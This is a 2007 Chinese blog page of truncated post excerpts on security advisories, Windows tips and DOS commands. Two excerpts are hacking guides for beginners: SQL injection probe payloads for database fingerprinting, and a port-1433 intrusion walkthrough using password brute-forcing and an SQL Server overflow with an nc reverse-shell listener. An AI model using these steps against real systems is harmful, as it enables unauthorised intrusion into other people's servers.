百度首页 | 百度空间
 
文章列表
 
您正在查看 "技术知识" 分类下的文章

2007年04月28日 星期六 21:56
据国外媒体报道,本周在苹果Safari浏览器中发现的一处安全漏洞同样影响微软IE7和MozillaFirefox浏览器。

  在本周于北美举行的“CanSecWest计算机安全大会”上,软件工程师ShaunMacaulay利用MacOS内置的Safari浏览器的一处安全漏洞,成功地入侵了

类别:技术知识 | 评论(0) | 浏览()
 
2007年04月26日 星期四 21:03

受影响系统:
Double Precision Courier-IMAP 4.0.1

不受影响系统:
Double Precision Courier-IMAP 4.0.6-r2

描述:
Courier-IMAP是Courier邮件系统中的IMAP服务程序。

Courier-IMAP对变量数据的过滤上存在

类别:技术知识 | 评论(0) | 浏览()
 
2007年04月26日 星期四 21:02

受影响系统:
Oracle Application Server 10g Release 2 10.1.2.0.0

描述:
Oracle应用服务器是一个综合解决方案,用于开发、集成和部署企业的应用系统、门户和网站。

Oracle应用服务器的动态监听服务(DMS)没有正确地过滤servlet/Spy中的

类别:技术知识 | 评论(0) | 浏览()
 
2007年04月25日 星期三 12:14

如何优化内存的管理,提高内存的使用效率,尽可能地提高运行速度,是我们所关心的问题。下面介绍在Windows操作系统中,提高内存的使用效率和优化内存管理的几种方法。

方法一:调整高速缓存区域的大小

可以在“计算机的主要用途”选项卡中设置系统利用高速缓存的比例(针对Windows 98)。如果系统的内存较多,可选择“

类别:技术知识 | 评论(0) | 浏览()
 
2007年04月23日 星期一 21:47
.判断是否有注入;and 1=1 ;and 1=2


2.初步判断是否是mssql ;and user>0


3.注入参数是字符’and [查询条件] and ’’=’


4.搜索时没过滤参数的’and [查询条件] and ’%25’=’


5.判断数据库系统

;and (select count(*) from sysobjects)>0 mssql

;and (select count(*) from msysobjects)>0 ac
类别:技术知识 | 评论(0) | 浏览()
 
2007年04月23日 星期一 21:34

希望对新手入侵有帮助!

1. 1433端口入侵

scanport.exe 查有1433的机器

SQLScanPass.exe 进行字典暴破(字典是关键)

最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口

(以上反向的,测试成功)

sqlhelloz.exe 入侵ip 1433 (这个是正向连接)

2.

类别:技术知识 | 评论(0) | 浏览()
 
2007年04月23日 星期一 21:31
通过135端口入侵实际上是利用RPC漏洞来攻击计算机的。一般情况下135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)

  协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机上运行的程序可以顺利地 执行远程计算机上的代码;

  使用DCOM可以通过
类别:技术知识 | 评论(0) | 浏览()
 
2007年04月23日 星期一 21:27

第一、几个基本概念

  Cookies欺骗,就是在只对用户做Cookies验证的系统中,通过修改Cookies的内容来得到相应的用户权限登录。(呵呵,我自己的定义,高手别见笑)

  那么什么是Cookies呢,我这里给大家一个专业的解释,Cookies是一个储存于浏览器目录中的文本文件,记录你访问一个特定站点的信息,且只能被创建这个Cookies的站点读回,约由255个字符组成,仅占4KB硬盘空间。当用户正在浏览某站点时,它储存于用户机的随机存取存储器RAM中,退出浏览器后,它储存于用户的硬盘中。储存在Cookies中的大部分

类别:技术知识 | 评论(0) | 浏览()
 
2007年04月22日 星期日 18:14
们可以按以下几个方法来判断。

  一、反病毒软件的扫描法

  这恐怕是我们绝大数朋友首选,也恐怕是唯一的选择,现在病毒种类是越来越多,隐蔽的手段也越来越高明,所以给查杀病毒带来了新的难度,也给反病毒软件开发商带来挑战。但随着计算机程序开发语言的技术性提高、计算机网络越来越普及,病毒的开发和传播是越来越容易了,因而反病毒软件开发公司也是越来越多了。但目前比较有名的还是那么几个系统的反病毒软件,如

类别:技术知识 | 评论(0) | 浏览()
 
2007年04月21日 星期六 22:16

#3 三:

ver 在DOS窗口下显示版本信息
winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
md 目录名 创建目录
replace 源文件 要替换文件的目录 替换文件
ren 原文件名 新文件名 重命名文件名
tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称
type 文件名 显示文本文件的内容
more 文件名 逐屏显示输出文件
doskey 要锁定的命令=字符

类别:技术知识 | 评论(0) | 浏览()
 
     
 
 
文章分类
 
 
 
 
 
     
 
文章存档
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
     
 
最新文章评论
   

楼上兄弟说的对
 

你就算不看,也在电脑前面呆很久
 
 

看电子书就可以了
 
 
     


©2008 Baidu